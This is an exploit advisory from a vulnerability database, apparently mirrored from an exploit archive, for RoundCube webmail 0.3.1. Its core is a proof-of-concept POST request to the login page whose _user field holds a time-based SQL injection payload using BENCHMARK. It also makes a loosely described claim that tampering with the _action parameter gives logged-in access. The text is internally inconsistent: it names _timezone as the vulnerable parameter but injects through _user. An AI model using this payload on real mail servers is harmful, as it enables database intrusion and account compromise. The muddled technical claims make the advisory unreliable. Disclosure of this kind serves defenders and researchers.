RoundCube 0.3.1 XRF/SQL injection

2014-07-01T00:00:00
ID SSV:72209
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: RoundCube 0.3.1 SQL injection
# Date: 10/10/2011
# Author: Smith Falcon
# Software Link: http://roundcube.net/download
# Version: 0.3.1
# Tested on: Linux

_timezone=
is vulnerable to SQL Union Injection.

"POST" data in

http://site.com/roundcube/index.php

_pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"


XRF vulnerable [ POC ]

POST variable

changing variable _action=login to "_action=anything" shows you the site is
vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
attacks. Successful tampering will lead to username compromising.

_action=loggedin

Credits - iqZer0